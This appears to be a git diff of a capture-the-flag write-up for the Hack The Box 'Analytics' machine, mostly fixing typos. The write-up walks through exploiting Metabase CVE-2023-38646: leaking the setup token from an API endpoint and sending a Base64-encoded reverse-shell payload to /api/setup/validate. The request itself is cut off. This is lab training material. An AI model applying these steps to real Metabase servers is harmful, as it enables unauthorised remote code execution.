Z4kr-Sec/z4kr-sec.github.io/content/HTB/Easy/Analytics-HTB.md

 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 ```

-The scan reveal *2 open ports* (22 & 80) and we can see its redirecting to the domain *analytical.htb*.
-Adding analytical.htb to /etc/hosts allowed us to access the web service; after investigating the web page we can find a subdomain, data.analytical.htb, hosting a **Metabase** login page.
+The scan reveals *2 open ports* (22 & 80) and we can see it's redirecting to the domain *analytical.htb*.
+Adding `analytical.htb` to `/etc/hosts` allowed us to access the web service; after investigating the web page, we can find a subdomain, `data.analytical.htb`, hosting a **Metabase** login page.

 ![Alt Text](/assets/images/HTB/Analytics/Analitics1.png)

-## FootHold.
+## FootHold

-### Finding the exploit.
+### Finding the exploit
-I looked only for "metabase Vulnerabilities" and I am able to find an unauthenticated RCE vulnerability (**CVE-2023-38646**).
+I looked only for "Metabase Vulnerabilities" and I am able to find an unauthenticated RCE vulnerability (**CVE-2023-38646**).
 CVE-2023-38646 is a critical vulnerability in Metabase, an open-source business intelligence tool, allowing pre-authentication remote code execution (RCE).
 This means an attacker can execute arbitrary commands on a Metabase server **without needing valid login credentials**.
 Exploiting this required extracting the setup token from the API endpoint */api/session/properties* (for more information on this exploit, check this [blog](https://www.assetnote.io/resources/research/chaining-our-way-to-pre-auth-rce-in-metabase-cve-2023-38646)).

-### Exploit setup.
+### Exploit setup

-If we go to http://data.analytical.htb/api/session/properties we will be able to see some "restictied/privileged" information the API is providing us due to **insufficient validation and accass control** on metabase.
+If we go to http://data.analytical.htb/api/session/properties we will be able to see some "restricted/privileged" information the API is providing us due to **insufficient validation and access control** on Metabase.

 ![Alt Text](/assets/images/HTB/Analytics/Analitics2.png)

-- **setup-token** :249fa03d-fd94-4d5b-b94f-b4ebf3df681f
+- **setup-token**: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f

 By creating a payload encoded in Base64, we could inject a reverse shell via Metabase's database setup.
-Here is an example of the *post* request that needs to be made to trigger the vulnerability:
+Here is an example of the POST request that needs to be made to trigger the vulnerability:

 ```json
 POST /api/setup/validate HTTP/1.1